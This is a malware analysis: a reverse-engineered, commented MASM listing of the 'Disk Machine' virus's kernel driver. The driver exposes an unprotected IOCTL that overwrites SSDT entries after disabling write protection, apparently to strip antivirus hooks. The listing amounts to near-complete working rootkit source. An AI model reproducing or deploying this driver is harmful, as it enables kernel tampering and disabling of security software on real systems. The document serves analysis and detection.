; Reverse analysis of the driver component of the "Disk Machine" (磁盘机) virus.
; This is a simple reversed listing that illustrates how the driver part works.
; Target: 32-bit x86 kernel-mode driver, MASM syntax, flat stdcall model. The
; listing is IDA-derived: hard-coded structure offsets, numeric NTSTATUS values
; and XREF comments are kept as they came out of the disassembler.
.386
.model flat, stdcall
option casemap:none
;+++++++++++++++++++++++++++++++++++++++++++++++++++++
; include files: kernel headers and import libraries
; (w2kundoc.inc suggests Four-F's KmdKit headers -- presumably)
;+++++++++++++++++++++++++++++++++++++++++++++++++++++
include ntstatus.inc
include ntddk.inc
include hal.inc
includelib hal.lib
include ntoskrnl.inc
includelib ntoskrnl.lib
include w2kundoc.inc
include winioctl.inc
; unicode page, string, zero
; Emits STRING as 16-bit characters: each character byte is followed by
; PAGE (the high byte; 0 for Latin text), and when ZERO is given it is
; appended once as the terminating word. Used for the NT object names in .data.
unicode macro page,string,zero
irpc c,<string> ; once per character of STRING
db '&c', page ; low byte = the character, high byte = PAGE
endm
ifnb <zero> ; optional terminator word
dw zero
endif
endm
; UNICODE_STRING -- counted wide-character string used by the NT API.
UNICODE_STRING struc ; (sizeof=0x8, standard type)
Length dw ? ; length of the string in bytes (no terminator counted)
MaximumLength dw ? ; size of the Buffer in bytes
Buffer dd ? ; offset ; pointer to the wide characters
UNICODE_STRING ends
.data
; SEH scope table for DispatchDeviceControl (pushed before ExceptionHanlder):
; one entry {EnclosingLevel = -1, FilterFunc = loc_10487, HandlerFunc = loc_10495},
; the layout _except_handler3 walks.
dword_10360 dd 0FFFFFFFFh ; DATA XREF: .text:000103E8o
dd offset loc_10487 ; filter
dd offset loc_10495 ; handler
; CodeView "RSDS" (PDB 7.0) debug record: signature 'RSDS', 16-byte GUID,
; age 21h, then the PDB path. A build-environment artefact -- useful for
; identifying samples from the same build, never executed.
dd 53445352h, 5632D867h, 45D1F0DEh, 0A70FE48Fh, 9D70EB8Eh, 21h
s_EDdkDdd2Drive db 'E:/DDK/ddd2/Driver/objfre/i386/ddd2.pdb',0
; DbgPrint strings (kernel-debugger output; also usable as detection strings).
s_Dispatchcreat db 'DisPatchCreate!',0 ;
szunhook db '开始恢复SSDT',0 ; "start restoring SSDT" -- printed before each SSDT write
s_Deletesymboli db 'DeleteSymbolicLink Fail!',0 ;
; ---------------------------------------------------------------------------
align 4
; Object names as 16-bit strings (unicode macro: high byte 0, 0-word terminator).
; NOTE(review): the listing shows forward slashes; NT object paths use
; backslashes, so the original binary presumably held '\' here -- confirm.
SourceString:
unicode 0, </ABCTEST>,0 ; initialised into DestinationString first, then overwritten by the device name
align 10h
s_DeviceNetapi0:
unicode 0, </Device/NetApi000>,0 ; device name passed to IoCreateDevice
Format db 'IoCreateDevice Fail!',0 ;
s_??Netapi000do:
unicode 0, </??/NetApi000DOS>,0 ; symbolic link name (reachable from user mode)
align 10h
s_Iocreatesymbo db 'IoCreateSymbolicLink fail!',0 ;
; Copy of the registry path built by DriverEntry, laid out as a
; UNICODE_STRING {Length, MaximumLength, Buffer} followed by 4 pad bytes.
; DriverEntry zeroes 16 bytes from word_10780 with four stosd, i.e. through
; word_1078C and 2 bytes beyond it.
word_10780 dw 0 ; Length
word_10782 dw 0 ; MaximumLength (= Length + 2)
lpMEM dd 0 ; Buffer: NonPagedPool, tag 32646464h ('ddd2'); never freed
db 0
db 0
db 0
db 0
word_1078C dw 0 ; WDM version code 130h/120h/110h/105h/100h (set in DriverEntry)
; UNICODE_STRING DestinationString
DestinationString UNICODE_STRING <0> ; device name (RtlInitUnicodeString)
; PDEVICE_OBJECT DeviceObject
DeviceObject dd 0 ; device created by IoCreateDevice
; UNICODE_STRING UNsymbolicName
UNsymbolicName UNICODE_STRING <0> ; symbolic link name; deleted in DriverUnload
.code
DispatchCreate proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
; NTSTATUS DispatchCreate(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
; DriverEntry stores this routine in every MajorFunction slot it fills
; (IRP_MJ_DEVICE_CONTROL is then replaced by DispatchDeviceControl).
; It logs and completes the IRP with STATUS_SUCCESS / Information = 0, so
; create (open) requests against the device always succeed.
; Unlike the other procs this one relies on the MASM-generated ebp frame
; (pIrp is referenced by name).
push offset s_Dispatchcreat ; "DisPatchCreate!"
call DbgPrint ; cdecl: the argument is not popped here -- NOTE(review): relies on the generated epilogue to discard it; confirm
mov eax,pIrp
assume eax : ptr _IRP
mov [eax].IoStatus.Status, STATUS_SUCCESS
mov [eax].IoStatus.Information, 0
assume eax :nothing
invoke IoCompleteRequest,pIrp,IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreate endp
; ---------------------------------------------------------------------------
DispatchDeviceControl proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
; NTSTATUS DispatchDeviceControl(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
; IRP_MJ_DEVICE_CONTROL handler. One IOCTL (22E14Bh) is served: the caller
; passes an SSDT index in the 4-byte input buffer and a 4-byte value in the
; output buffer; the value is written into KeServiceDescriptorTable's
; ServiceTableBase[index] after CR0.WP is cleared. Only the index is range
; checked -- the value is not validated -- so whoever can open the device
; (see DriverEntry: no security descriptor, user-reachable symbolic link)
; can redirect any system service. Detection points: the IOCTL code, the
; CR0 writes, the DbgPrint strings and SSDT integrity checks.
; Frame: built by ExceptionHanlder (the MSVC-style SEH prologue), not by
; MASM; every [ebp+/-n] below assumes that frame. NOTE(review): the typed
; parameter list on the proc line would make MASM emit its own prologue --
; confirm which frame the assembled code really gets.
; Register roles: edi = pIrp, ebx = NTSTATUS to return (default
; 0C0000010h = STATUS_INVALID_DEVICE_REQUEST), esi = Irp->UserBuffer.
; Frame slots from the prologue: [ebp-4] try level, [ebp-14h]
; EXCEPTION_POINTERS* (read by the filter), [ebp-18h] saved esp.
; Locals: [ebp-1Ch] Type3InputBuffer, [ebp-20h] OutputBufferLength,
; [ebp-24h] ServiceTableBase, [ebp-28h] exception code.
push 18h ; size of the local area the SEH prologue reserves
push offset dword_10360 ; scope table: filter loc_10487, handler loc_10495
call ExceptionHanlder
mov ebx, 0C0000010h ; default status: STATUS_INVALID_DEVICE_REQUEST
mov edi, [ebp+0Ch] ; edi = pIrp (second argument)
mov eax, [edi+60h] ; current stack location: Irp->Tail.Overlay.CurrentStackLocation (x86 IRP offset 60h)
mov ecx, [eax+0Ch] ; ecx = Parameters.DeviceIoControl.IoControlCode
loc_10400: ; CODE XREF: .text:000103DFj
mov edx, [eax+10h] ; edx = Parameters.DeviceIoControl.Type3InputBuffer (raw user pointer)
mov [ebp-1Ch], edx
mov esi, [edi+3Ch] ; esi = Irp->UserBuffer (raw user pointer; METHOD_NEITHER output buffer)
mov eax, [eax+4] ; eax = Parameters.DeviceIoControl.OutputBufferLength
mov [ebp-20h], eax
cmp ecx, 22E14Bh ; decodes as device type 22h, function 852h, METHOD_NEITHER, read|write access
jnz exit ; any other code completes with STATUS_INVALID_DEVICE_REQUEST
and dword ptr [ebp-4], 0 ; __try level 0: the probes below may raise
push 4
pop ebx ; ebx = 4: Length and Alignment for both probes
push ebx ; Alignment
push ebx ; Length
push edx ; Address = Type3InputBuffer
call ds:ProbeForRead
push ebx ; Alignment
push ebx ; Length
push esi ; Address = UserBuffer
call ds:ProbeForWrite
or dword ptr [ebp-4], 0FFFFFFFFh ; __try level -1: guarded region ends here
; NOTE(review): the user pointers are dereferenced below, OUTSIDE the __try;
; a page that is unmapped after the probe faults without a handler.
mov eax, [ebp-1Ch]
mov ebx, [eax] ; ebx = *(ULONG*)InputBuffer = requested service index
mov eax, ds:KeServiceDescriptorTable ; eax = &KeServiceDescriptorTable (via the import slot); "restore the SSDT entry hooked by AV software"
cmp [eax+8], ebx ; NumberOfServices > index ? (unsigned compare)
ja short unhook
mov ebx, 0C000000Dh ; STATUS_INVALID_PARAMETER: index out of range
jmp short exit
; ---------------------------------------------------------------------------
unhook: ; CODE XREF: .text:00010445j
mov eax, [eax] ; eax = ServiceTableBase
mov [ebp-24h], eax
push dword ptr [esi] ; value from the user output buffer (format string has no specifiers; unused)
push ebx ; index (unused by the format string)
push offset szunhook ; "start restoring SSDT"
call DbgPrint
add esp, 0Ch ; cdecl: drop the three arguments
cli ; masks interrupts on this CPU only -- no protection against other processors
mov eax, cr0 ; clear CR0.WP so the read-only service table page can be written
and eax, 0FFFEFFFFh
mov cr0, eax
mov eax, [esi] ; eax = *(ULONG*)UserBuffer (again outside the __try)
mov ecx, [ebp-24h]
mov [ecx+ebx*4], eax ; ServiceTableBase[index] = caller-supplied value, unvalidated
mov eax, cr0
or eax, 10000h ; set CR0.WP again
mov cr0, eax
sti
xor ebx, ebx ; STATUS_SUCCESS
jmp short exit
; ---------------------------------------------------------------------------
loc_10487: ; DATA XREF: .text:00010364o
; SEH filter (scope table entry): called by _except_handler3 with the
; EXCEPTION_POINTERS* in [ebp-14h]; records the exception code and
; returns 1 = EXCEPTION_EXECUTE_HANDLER.
mov eax, [ebp-14h] ; EXCEPTION_POINTERS*
mov eax, [eax] ; ->ExceptionRecord
mov eax, [eax] ; ->ExceptionCode
mov [ebp-28h], eax
xor eax, eax
inc eax ; return EXCEPTION_EXECUTE_HANDLER
retn
; ---------------------------------------------------------------------------
loc_10495: ; DATA XREF: .text:00010368o
; __except block: a probe raised (invalid user pointer). The exception code
; becomes the completion status.
mov esp, [ebp-18h] ; restore the stack pointer saved by the SEH prologue
mov ebx, [ebp-28h] ; status = exception code
or dword ptr [ebp-4], 0FFFFFFFFh ; try level -1
mov edi, [ebp+0Ch] ; edi = pIrp again
exit: ; CODE XREF: .text:00010415j
; .text:0001044Cj .text:00010485j
; Complete the IRP: Information = (status == 0) ? OutputBufferLength : 0.
mov eax, ebx
neg eax
sbb eax, eax ; eax = (ebx != 0) ? -1 : 0
not eax ; eax = (ebx != 0) ? 0 : -1
and eax, [ebp-20h] ; eax = success ? OutputBufferLength : 0
mov [edi+1Ch], eax ; Irp->IoStatus.Information
mov [edi+18h], ebx ; Irp->IoStatus.Status
xor dl, dl ; PriorityBoost = IO_NO_INCREMENT
mov ecx, edi ; Irp (fastcall: ecx, dl)
call ds:IofCompleteRequest
mov eax, ebx ; return the status
call ReSEH ; SEH epilogue: unlink fs:0, restore ebx/esi/edi and the caller's ebp
retn 8
DispatchDeviceControl endp
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
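DriverUnload proc ; DATA XREF: DriverEntry+DAo
; VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
; stdcall, one dword argument cleaned by the callee (retn 4). No MASM
; frame is generated (no typed parameters), so the argument is read at
; [esp+4]. Deletes the symbolic link and the device created in DriverEntry.
; Review notes: the NonPagedPool block in lpMEM is not freed here either;
; only a status of exactly 0 is treated as success for the link deletion.
push offset UNsymbolicName ; "/??/NetApi000DOS" (as initialised in DriverEntry)
call ds:IoDeleteSymbolicLink
test eax, eax
jz short delOK ; STATUS_SUCCESS == 0
push offset s_Deletesymboli ; "DeleteSymbolicLink Fail!"
call DbgPrint ; cdecl: caller pops the argument
pop ecx
delOK: ; CODE XREF: .text:000104EEj
mov eax, [esp+4] ; eax = pDriverObject
push dword ptr [eax+4] ; pDriverObject->DeviceObject (x86 DRIVER_OBJECT offset 4)
call ds:IoDeleteDevice
retn 4
DriverUnload endp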
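DriverEntry proc ; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
; stdcall, two dword arguments cleaned by the callee (retn 8). The body
; addresses its arguments relative to esp, so no MASM frame is declared;
; the argument offsets are the listing's own equates: after push ebx /
; push esi the first argument is at [esp+0Ch] and the second at
; [esp+10h], and after the third push (edi) another 4 is added.
; Register roles: ebx = &word_10780, then pDriverObject, then status;
; esi = pRegistryPath, then IoIsWdmVersionAvailable, then &DestinationString;
; edi = stosd destination, then MajorVersion (1), then RtlInitUnicodeString.
; Returns STATUS_SUCCESS, the IoCreateDevice / IoCreateSymbolicLink status,
; or 0C000009Ah (STATUS_INSUFFICIENT_RESOURCES) when the pool allocation fails.
; Review notes: the pool block (lpMEM) is never freed on any path and the
; device is not deleted when IoCreateSymbolicLink fails; the device is created
; without a security descriptor and gets a user-reachable symbolic link, which
; is what exposes DispatchDeviceControl's SSDT write to user mode.
pDriverObject = dword ptr 0Ch
pRegistryPath = dword ptr 10h
push ebx
push esi
mov esi, [esp+pRegistryPath] ; esi = pRegistryPath
push edi
xor eax, eax
mov ebx, offset word_10780 ; ebx = &word_10780 (UNICODE_STRING copy of the registry path)
mov edi, ebx
stosd ; zero 16 bytes at word_10780: Length/MaximumLength, lpMEM, the pad bytes, word_1078C
stosd
stosd
stosd
mov ax, [esi] ; ax = pRegistryPath->Length (bytes)
mov word_10780, ax ; copy.Length
mov ax, [esi]
add ax, 2 ; room for the terminating UNICODE_NULL (16-bit add; wraps for Length >= 0FFFEh)
mov word_10782, ax ; copy.MaximumLength
movzx eax, ax
push 32646464h ; Tag 'ddd2'
xor edi, edi
push eax ; NumberOfBytes = Length + 2
inc edi ; edi = 1
push edi ; PoolType = NonPagedPool (1)
call ds:ExAllocatePoolWithTag
test eax, eax
mov lpMEM, eax ; copy.Buffer
jnz short is2003
mov eax, 0C000009Ah ; STATUS_INSUFFICIENT_RESOURCES
jmp loc_106D7
; ---------------------------------------------------------------------------
is2003: ; CODE XREF: DriverEntry+44j
push esi ; SourceString = pRegistryPath
push ebx ; DestinationString = &word_10780
call ds:RtlCopyUnicodeString
mov esi, ds:IoIsWdmVersionAvailable
; Probe the WDM version downwards (1.30, 1.20, 1.10, 1.05) and record a
; code in word_1078C: 130h, 120h, 110h, 105h, or 100h when none matched.
; edi stays 1 = MajorVersion for every call.
push 30h ; MinorVersion 30h (WDM 1.30: Windows Server 2003)
push edi ; MajorVersion 1
call esi ; IoIsWdmVersionAvailable
test al, al
jz short isXP
mov word_1078C, 130h
jmp short supportWDM
; ---------------------------------------------------------------------------
isXP: ; CODE XREF: DriverEntry+65j
push 20h ; MinorVersion 20h (WDM 1.20: Windows XP)
push edi ; MajorVersion 1
call esi ; IoIsWdmVersionAvailable
test al, al
jz short is2000
mov word_1078C, 120h
jmp short supportWDM
; ---------------------------------------------------------------------------
is2000: ; CODE XREF: DriverEntry+79j
push 10h ; MinorVersion 10h (WDM 1.10: Windows 2000)
push edi ; MajorVersion 1
call esi ; IoIsWdmVersionAvailable
test al, al
jz short isME
mov word_1078C, 110h
jmp short supportWDM
; ---------------------------------------------------------------------------
isME: ; CODE XREF: DriverEntry+8Dj
push 5 ; MinorVersion 05h (WDM 1.05: Windows Me)
push edi ; MajorVersion 1
call esi ; IoIsWdmVersionAvailable
neg al
sbb eax, eax ; eax = al ? -1 : 0
and eax, 5 ; eax = al ? 5 : 0
add eax, 100h ; 105h when available, else 100h
mov word_1078C, ax
supportWDM: ; CODE XREF: DriverEntry+70j
; DriverEntry+84j DriverEntry+98j
mov ebx, [esp+4+pDriverObject] ; ebx = pDriverObject (+4: edi was pushed above)
push 1Bh
pop ecx ; ecx = 1Bh = 27 MajorFunction slots
mov eax, offset DispatchCreate
lea edi, [ebx+38h] ; &pDriverObject->MajorFunction[IRP_MJ_CREATE] (x86 DRIVER_OBJECT offset 38h)
rep stosd ; every slot -> DispatchCreate (completes with success)
mov edi, ds:RtlInitUnicodeString
push offset SourceString ; "/ABCTEST" -- placed in DestinationString, then overwritten below
mov esi, offset DestinationString
push esi ; DestinationString
mov dword ptr [ebx+70h], offset DispatchDeviceControl ; MajorFunction[IRP_MJ_DEVICE_CONTROL] (slot 0Eh)
mov dword ptr [ebx+34h], offset DriverUnload ; pDriverObject->DriverUnload
call edi ; RtlInitUnicodeString(&DestinationString, SourceString)
push offset s_DeviceNetapi0 ; "/Device/NetApi000"
push esi ; DestinationString
call edi ; RtlInitUnicodeString(&DestinationString, device name)
push offset DeviceObject ; DeviceObject (out)
xor eax, eax
push eax ; Exclusive = FALSE
push eax ; DeviceCharacteristics = 0
push 22h ; DeviceType = 22h (FILE_DEVICE_UNKNOWN)
push esi ; DeviceName
push eax ; DeviceExtensionSize = 0
push ebx ; DriverObject
call ds:IoCreateDevice ; no security descriptor: the device is open to any caller
mov ebx, eax ; ebx = status
test ebx, ebx
jge short loc_106AF ; NT_SUCCESS
push offset Format ; "IoCreateDevice Fail!"
call DbgPrint
pop ecx ; cdecl: drop the argument
mov eax, ebx ; return the IoCreateDevice status
jmp short loc_106D7
; ---------------------------------------------------------------------------
loc_106AF: ; CODE XREF: DriverEntry+103j
push offset s_??Netapi000do ; "/??/NetApi000DOS"
mov ebx, offset UNsymbolicName
push ebx ; DestinationString
call edi ; RtlInitUnicodeString(&UNsymbolicName, link name)
push esi ; DeviceName
push ebx ; SymbolicLinkName
call ds:IoCreateSymbolicLink ; makes the device reachable by name from user mode
mov esi, eax
test esi, esi
jge short loc_106D5 ; NT_SUCCESS
push offset s_Iocreatesymbo ; "IoCreateSymbolicLink fail!"
call DbgPrint
pop ecx ; cdecl: drop the argument
loc_106D5: ; CODE XREF: DriverEntry+12Dj
mov eax, esi ; return the IoCreateSymbolicLink status (the device is left in place on failure)
loc_106D7: ; CODE XREF: DriverEntry+4Bj
; DriverEntry+112j
pop edi
pop esi
pop ebx
retn 8
DriverEntry endp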
; ---------------------------------------------------------------------------
ExceptionHanlder proc
; MSVC-style SEH prologue (the compiler's _SEH_prolog helper). The caller
; pushes the local-area size and the scope table and calls here; this
; routine installs an EXCEPTION_REGISTRATION_RECORD at fs:0, builds the ebp
; frame and returns into the caller with the frame in place.
; Stack on entry after the two pushes below: [esp] = previous fs:0,
; [esp+4] = _except_handler3, [esp+8] = return address,
; [esp+0Ch] = scope table, [esp+10h] = local-area size.
; NOTE(review): arg_4 is not defined anywhere in this listing; the offsets
; only work with arg_4 = 8, so that [esp+8+arg_4] is the size slot at [esp+10h].
; Resulting frame: [ebp] saved ebp, [ebp-4] try level (-1),
; [ebp-8] scope table, [ebp-0Ch] handler, [ebp-10h] previous fs:0
; (the registration record lives at ebp-10h), [ebp-14h] first local,
; [ebp-18h] saved esp, then ebx/esi/edi below the locals.
; Paired with ReSEH. Clobbers eax.
push offset _except_handler3 ; registration.Handler
mov eax, large fs:0
push eax ; registration.Next = previous list head
mov large fs:0, esp ; install: esp points at the registration record (== ebp-10h below)
mov eax, [esp+8+arg_4] ; eax = local-area size pushed by the caller (18h)
mov [esp+8+arg_4], ebp ; reuse that slot to save the caller's ebp
lea ebp, [esp+8+arg_4] ; ebp -> saved ebp
sub esp, eax ; reserve the locals
push ebx
push esi
push edi
mov eax, [ebp-8] ; eax = return address into the caller
mov [ebp-18h], esp ; saved esp, restored by the __except block
push eax ; re-push the return address for the retn below
mov eax, [ebp-4] ; eax = scope table
mov dword ptr [ebp-4], 0FFFFFFFFh ; try level = -1 (not inside a __try)
mov [ebp-8], eax ; scope table now sits in the registration record
retn ; back into the caller; its two pushed values became saved ebp and try level
ExceptionHanlder endp
; *************** S U B R O U T I N E ***************************************
ReSEH proc near ; CODE XREF: .text:000104BFp
; MSVC-style SEH epilogue (the compiler's _SEH_epilog helper): unlinks the
; registration record installed by ExceptionHanlder, restores ebx/esi/edi
; and the caller's ebp, and returns to the caller with esp at its own
; return address so that it can retn n. eax (the return value) is
; preserved; ecx is clobbered. Must be called with esp equal to the value
; saved in [ebp-18h] by the prologue (just above the pushed edi).
mov ecx, [ebp-10h] ; previous fs:0 (registration.Next)
mov large fs:0, ecx ; unlink our record
pop ecx ; ecx = our own return address
pop edi
pop esi
pop ebx
leave ; esp = ebp, pop the caller's ebp
push ecx ; put our return address back on top
retn ; return to the caller, which then does its retn n
ReSEH endp
end DriverEntry